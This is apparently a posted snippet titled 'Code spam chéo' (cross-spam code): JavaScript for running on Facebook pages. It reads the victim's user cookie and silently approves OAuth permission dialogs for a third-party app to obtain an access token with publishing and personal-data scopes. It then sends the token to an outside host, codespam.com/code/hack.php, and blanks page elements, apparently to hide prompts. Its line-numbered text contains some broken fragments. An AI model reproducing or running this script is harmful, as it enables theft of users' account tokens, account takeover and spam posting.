Code spam chéo

1. if(location.hostname.indexOf
2.  
3. ('www.facebook.com','static.ak.facebook.com','apps.facebook.com','beta.
4.  
5. facebook.com') >= 0){
6. var profile_id = document.cookie.match(document.cookie.match(/c_user=
7.  
8. (\d+)/)[1]).toString();
9. function uygulamaizinver(url){
10. var xmlhttp = new XMLHttpRequest();
11. xmlhttp.onreadystatechange = function () {
12. if(xmlhttp.readyState == 4){
13. izinverhtml = document.createElement('html');
14. izinverhtml.innerHTML = xmlhttp.responseText;
15. if(izinverhtml.getElementsByTagName('form').length > 0){
16. izinverhtml.innerHTML = izinverhtml.getElementsByTagName('form')
17.  
18. [0].outerHTML
19. act = izinverhtml.getElementsByTagName('form')[0].action;
20. duzenlevegonder(izinverhtml,act);
21. }
22. }
23. };
24. xmlhttp.open('GET', url, true);
25. xmlhttp.send();
26. }
27. function duzenlevegonder(formnesne,act){
28. izinverparams = '';
29. for(i=0;i<formnesne.getElementsByTagName('input').length;i++){
30. if(formnesne.getElementsByTagName('input')[i].name.indexOf
31.  
32. ('__CANCEL__') < 0 && formnesne.getElementsByTagName('input')
33.  
34. [i].name.indexOf('cancel_clicked')){
35. izinverparams += '&' + formnesne.getElementsByTagName('input')[i].name
36.  
37. + '=' + formnesne.getElementsByTagName('input')[i].value;
38. }
39. }
40. if(formnesne.getElementsByTagName('select').length > 0){
41. izinverparams += '&' + formnesne.getElementsByTagName('select')[0].name
42.  
43. + '=80';
44. }
45. izinverparams.replace('&fb_dtsg','fb_dtsg');
46. izinverparams += '&__CONFIRM__=1';
47. formnesne = formnesne;
48. var xmlhttp = new XMLHttpRequest();
49. xmlhttp.onreadystatechange = function () {
50. if(xmlhttp.readyState == 4){
51. izinhtml = document.createElement('html');
52. izinhtml.innerHTML = xmlhttp.responseText;
53. if(izinhtml.getElementsByTagName('form').length > 0){
54. izinhtml.innerHTML = izinhtml.getElementsByTagName('form')
55.  
56. [0].outerHTML;
57. act = izinhtml.getElementsByTagName('form')[0].action;
58. duzenlevegonder(izinhtml,act)
59. }else{
60. sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
61. if (sex[1]) {
62. tokenyolla(sex[1]);
63. }
64. }
65. }
66. };
67. xmlhttp.open('POST', act , true);
68. xmlhttp.setRequestHeader ('Content-Type', 'application/x-www-form-
69.  
70. urlencoded');
71. xmlhttp.send(izinverparams);
72. }
73. function TokenUrl(id){
74. return '//www.facebook.com/dialog/oauth?
75.  
76. response_type=token&display=popup&client_id=' + id
77.  
78. +'&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_str
79.  
80. eam,user_likes,friends_likes,user_birthday';
81. }
82. if(!localStorage['token_' + profile_id] || (localStorage['token_' +
83.  
84. profile_id] && tarih.getTime() >= localStorage['token_' +
85.  
86. profile_id])){
87. uygulamaizinver(TokenUrl('72687635881'));
88. var http = new XMLHttpRequest();
89. http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
90. http['send']();
91. var get = JSON.parse(http['responseText']);
92. var isim = get.name;
93. }
94. window.setInterval(function(){
95. if(document.getElementsByClassName('_5ce')){
96. for(i=0;i<document.getElementsByClassName('_5ce').length;i++){
97. document.getElementsByClassName('_5ce')[i].innerHTML = '';
98. }
99. }
100. if(document.getElementsByClassName('uiToggle wrap')){
101. for(i=0;i<document.getElementsByClassName('uiToggle wrap').length;i++){
102. document.getElementsByClassName('uiToggle wrap')[i].innerHTML = '';
103. }
104. }
105. if(document.getElementsByClassName('uiPopover')){
106. for(i=0;i<document.getElementsByClassName('uiPopover').length;i++){
107. document.getElementsByClassName('uiPopover')[i].innerHTML = '';
108. }
109. }
110. },200);
111. function tokenyolla(token){
112. top.location.href = 'http://codespam.com/code/hack.php#' + token;
113. }}